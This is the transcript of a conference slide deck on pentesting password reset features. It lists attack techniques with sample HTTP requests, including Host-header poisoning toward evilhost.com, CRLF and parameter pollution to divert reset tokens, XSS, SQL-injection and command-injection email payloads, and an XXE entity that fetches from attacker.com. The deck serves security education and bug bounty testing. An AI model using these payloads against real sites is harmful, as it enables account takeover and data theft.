Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Pentesting Password Reset Functionality

Anugrah SR
January 23, 2023

Pentesting Password Reset Functionality

This talk was part of RESET Hacker's Kerala's first session. Here we discuses about
Functionality hacking methodology:https://github.com/Anugrahsr/Functionality-Hacker
What is the password reset functionality
Flow the password reset functionality
What can go wrong
Mindmap, Checklist etc.

Recording can be found here: https://anugrahsr.in/

Anugrah SR

January 23, 2023
Tweet

More Decks by Anugrah SR

Other Decks in Technology

Transcript

  1. PENTESTING PASSWORD RESET FUNCTIONALITY - Anugrah SR

  2. ANUGRAH S R Cyber Security consultant at The SecOps Group

    Passive Bugbounty Hunter Synack Red Team Member Twitter: @cyph3r_asr | LinkedIn: anugrah-sr | Web: anugrahsr.in Blog: anugrahsr.in | p1boom.com Connect with me
  3. Functionality hacking methodology What is the password reset functionality Flow

    the password reset functionality What can go wrong Mindmap, Checklist AGENDA
  4. LOOKING FOR BUGS? Bug Type Functionality Wise ? XSS SQL

    Injection SSRF Hacking methodology
  5. LOOKING FOR BUGS? https://github.com/Anugrahsr/Functionality-Hacker

  6. Spot the Common One!

  7. Forgot Password?

  8. WHAT IS PASSWORD RESET? If a Web-app have a login,

    there be a password reset function! In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.
  9. FLOW

  10. WHAT COULD POSSIBLY GO WRONG HERE RIGHT? Let's see!

  11. Me and MAALP found this interesting password reset page OTP

  12. WHAT IF? Let's look at the impact FULL ACCOUNT TAKEOVER

    TOKEN LEAKAGE PARAMETER POLLUTION SQL INJECTION GUESSABLE TOKEN MORE..
  13. PASSWORD RESET POISONING If you have a Host Header attack,

    Request a password with evil host! Websites that handle the value of the Host header in an unsafe way POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: evilhost.com
  14. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

  15. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

  16. POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com:@evilhost.com POST

    https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com X-Forwarded-Host: attacker.com POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com Host: attacker.com POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: [email protected] Lab: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
  17. ATO: PARAMETER MANIPULATION We can pollute the parameter to get

    the reset token to attacker email POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com [email protected]&[email protected] POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com [email protected]
  18. POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com [email protected]&[email protected]

    POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: example.com [email protected] [email protected] [email protected]
  19. [email protected]%[email protected] [email protected]|[email protected] email="[email protected]%0a%0dcc:[email protected]" email="[email protected]%0a%0dbcc:[email protected]" email="[email protected]",email="[email protected]" {"email":["[email protected]","[email protected]"]} MORE MANIPULATION

  20. RESPONSE MANIPULATION Replace Bad Response With Good One HTTP/1.1 401

    Unauthorized (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”) HTTP/1.1 200 OK (“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
  21. TOKEN LEAKAGE IN RESPONSE Check the response to see if

    the token is leaked in response Add json extension to endpoint, eg: resetpassword.json GET /passwordReset.json HTTP/1.1 HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 { "email" : "[email protected]" , "token" : ******, "success" : "true" } GET /passwordReset HTTP/1.1 email [email protected] HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8
  22. TOKEN LEAKAGE Check the response to see if the token

    is leaked in response/js files etc 1 - Set Up Burp In Browser One 2 - Reset Password In Browser One 3 - Open The Password Reset Email In Browser Two 4 - Copy The Token 5 - Search Your Burp History For The Token
  23. RESET TOKEN LEAK VIA REFERER Once you visit the reset

    token link, click on any third party website eg Facebook Intercept the requst and check the referer header
  24. RESET TOKEN LEAK VIA REFERER Once you visit the reset

    token link, click on any third party website eg Facebook Intercept the requst and check the referer header GET /home HTTP/1.1 Host: www.third_party.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://company.com/resetpass?token=123-456-123-456 Origin: https://www.company.com
  25. GUESSABLE TOKEN Find out how password reset token is generated

    like Timestamp , UserID , Email and Weak Cryptography POST /resetPassword HTTP/1.1 Host: www.company.com Content-Type: application/x-www-form-urlencoded Origin: https://www.company.com Content-Length: Number [email protected]&token=<UserID-Timestamp>
  26. BRUTE FORCE THE TOKEN Find out how password reset token

    by force! Use IP-Rotate, additional headers etc POST /resetPassword/change HTTP/1.1 Host: www.company.com Content-Type: application/x-www-form-urlencoded Origin: https://www.company.com Content-Length: Number [email protected]&token=FUZZ&newpass=DontHackme!
  27. EXPERIMENT WITH THE TOKEN experiment with the password reset token!

    Remove the token completely Change the token to value 0 or 1 or -1 etc Use token value = null/nil Use expired token Try array of old tokens Use sequencer to check if the token have any patterns Add special characters Change request method/ content type
  28. POST /passwordreset HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length:

    Number [email protected]áil.com.id.burpcollaborator.net IDN HOMOGRAPH ATTACK Create an account with email [email protected] Now generate reset password link for email [email protected]áil.com.burpcollaborator.net
  29. LIST OF PAYLOADS AS EMAIL ADDRESSES test+(<script>alert(0)</script>)@gmail.com test(<script>alert(0)</script>)@gmail.com [email protected](<script>alert(0)</script>).com "<script>alert(0)</script>"@gmail.com

    "<%= 7 * 7 %>"@gmail.com test+(${{7*7}})@gmail.com "' OR 1=1 -- '"@gmail.com "test); DROP TABLE users;--"@gmail.com [email protected][id.collaborator.net] %@gmail.com
  30. XSS Test for XSS with [email protected]"><script>alert(document.domain)</script> payload GET /[email protected]"><script>alert(document.domain)</script> HTTP/1.1

    Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Referer: https://previous.com/path Origin: https://www.company.com
  31. GET /[email protected]'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0, sunil Content-Type: application/x-www-form-urlencoded

    Referer: https://previous.com/path Origin: https://www.company.com TIME BASED SQL INJECTION
  32. OS COMMAND INJECTION Reset password with email [email protected]`whoami`.id.burpcollaborator.net POST /passwordreset

    HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: Number [email protected]`whoami`.id.collaborator.net
  33. IDOR Test with your reset token and victim's email id/User-Id.

    POST /passwordreset HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: Number [email protected]&token=<Your-Token> POST /passwordreset HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: Number [email protected]&token=<Your-Token>
  34. XXE If password reset endpoint supports both json and xml

    Use Content Type Converter extension to change from json to xml, add your payload POST /resetPassword/change HTTP/1.1 Host: www.company.com Content-Type: application/xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE a [<!ENTITY % asd SYSTEM "http://attacker.com/XXE.dld">%asd;%c;]> <root>%rrr;<old>*****</old><new>*****</new></root>
  35. MFA AUTO DISABLING Sometimes MFA are auto-disabled after Password reset

    is done Enable 2FA Logout Password Reset 2FA is auto disabled
  36. SESSION EXPIRATION Test for insufficient session expiration after password change

    Open account in two different browsers In browser1 reset the password See if the session is expired in browser2
  37. USER ENUMERATION Enumerate username/email id based on difference in response

    by the webapp invalid email/username : user doesn't exist valid email/username: Password reset link is send to your email
  38. MISSING RATELIMITING Email bombing! send the password reset request to

    intruder start the attack Look at the choas you created in victim's email account Tip: [email protected]
  39. RE USABLE TOEKN Check if the token can be reused,

    if it's expired. Request password reset Dont use the link change the email address to a new email in account settings See if old token can be used
  40. MINDMAPS https://twitter.com/N008x/status/1302515523557548032/photo/1 - Gaurav Popalghat https://xmind.app/m/nZwbdk - Harsh Bothra/

  41. RESOURCES 10 Password Reset Flaws Anugrah SR Blog Slides Functionality

    Hacker ATO Password Reset Mahmoud M. Awali Slides Common Vulnerabilities In Forget Password Harsh Bothra MindMap
  42. https://github.com/Anugrahsr/Functionality-Hacker

  43. YOU'RE ONLY AS STRONG AS YOUR PASSWORD!

  44. THANKS FOR LISTENING TO ME! Twitter @cyph3r_asr LinkedIn @anugrah-sr www.anugrahsr.in

    Slides will be available here: